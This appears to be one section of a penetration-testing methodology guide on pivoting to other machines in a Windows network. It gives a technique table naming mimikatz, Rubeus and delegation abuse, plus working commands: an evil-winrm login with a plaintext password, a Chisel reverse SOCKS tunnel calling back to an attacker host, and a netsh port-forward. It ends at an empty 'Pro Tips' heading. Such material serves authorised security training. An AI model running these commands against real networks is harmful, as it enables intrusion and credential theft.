7. Pivoting to Other Machines on the Network

Goal: Move laterally across systems to access additional machines, credentials, or data.

Objectives

Mermaid Diagram

graph TD
    A[Access on Initial Host] --> B[Identify Reachable Hosts]
    B --> C[Find Valid Creds or Tokens]
    C --> D[Use SMB, WMI, WinRM, RDP for Pivot]
    D --> E[Execute Commands or Deploy Tools]
    E --> F[Enumerate New Machine for Privilege or DA Path]

Techniques and Tools

Technique Tool/Command Notes
Host Discovery fping, nmap, PowerShell Test-Connection Identify live hosts on subnets
Session Detection quser, Get-NetSession, Invoke-UserHunter (PowerView) Look for where users are logged in
SMB Pivot wmiexec.py, psexec.py, crackmapexec Leverage creds to execute commands over SMB
WMI Pivot wmiexec.py, Invoke-WmiMethod Remote command execution via WMI
WinRM Pivot evil-winrm, Enter-PSSession Preferred for stealthy and PowerShell-based access
RDP Pivot xfreerdp, mstsc Full interactive access if RDP is enabled
Reverse Proxy (Socks) Chisel, SSH -D, proxychains, meterpreter socks4a Create pivot tunnels for scanning or shell access
Port Proxy netsh interface portproxy Forward ports via compromised system
Token Impersonation mimikatz, Incognito, Rubeus Use available tokens from other logged-in users
TGT/TGS Delegation Abuse Rubeus, kerberos::ptt, unconstrained delegation Move using ticket-based attacks

Example: Pivot via Evil-WinRM

evil-winrm -i 172.16.7.50 -u svc_sql -p lucky7

Example: Chisel SOCKS Reverse Proxy

# On attacker (server)
./chisel server -p 8080 --reverse

# On target (client)
chisel.exe client <attacker_ip>:8080 R:socks

Then configure /etc/proxychains.conf with:

socks5 127.0.0.1 1080

Example: Port Forwarding with netsh

netsh interface portproxy add v4tov4 listenport=1515 listenaddress=10.10.10.10 connectport=3389 connectaddress=172.16.6.50

Pro Tips